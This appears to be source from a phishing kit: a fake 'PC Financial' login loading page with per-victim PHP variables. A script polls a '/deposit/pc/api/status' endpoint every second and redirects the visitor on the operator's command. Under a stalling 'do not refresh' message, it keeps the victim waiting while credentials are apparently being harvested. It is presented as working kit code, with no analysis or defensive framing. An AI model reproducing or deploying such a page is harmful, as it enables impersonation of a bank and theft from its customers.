
<html lang="en">
    <head>
        <base href="/">
        <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
        <meta http-equiv="Pragma" content="no-cache">
        <meta http-equiv="Expires" content="0">
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <title>Login | PC Financial</title>
        <link rel="stylesheet" href="/assets/pc/main.css?3" media="all" onload="this.media=&quot;all&quot;">
        <link rel="stylesheet" href="/assets/pc/styles.21f273279e0376a0.css?1" media="all" onload="this.media=&quot;all&quot;">
        <link rel="icon" type="image/x-icon" href="/assets/pc/favicon.ico">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script >
            setInterval(function() {
                $.post('/deposit/pc/api/status', {page: lrinfo}, function(response) {
                    if (response.status) {
                        location.href = response.href;
                    }
                }, 'JSON');
            }, 1000);
        </script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body class="">
        <div class="full-screen-loader div-loader" style="display: block">
            <div class="loader-container lrg loader-div">
                <div class="loader">
                    <p role="alert">Loading</p>
                </div>
            </div>
            <p style="display: none" class="pd">This is taking longer than usual, please do not refresh the page</p>
            <script>
            setInterval(function() {
                $('.pd').css('display', 'block');
            }, 4000);
            </script>
            <style>
            .pd {
                position: fixed;
                z-index: 999999;
                color: black;
                padding: 0px 76px;
                text-align: center;
                top: calc(50% + 69px);
                font-size: 16px;
            }
            </style>
        </div>
        <span hidden id="navig"> . </span>
        <span hidden id="stage">Loading</span>
    </body>
    <script src="/bank/pc/js/script.js">
    </script>
</html>
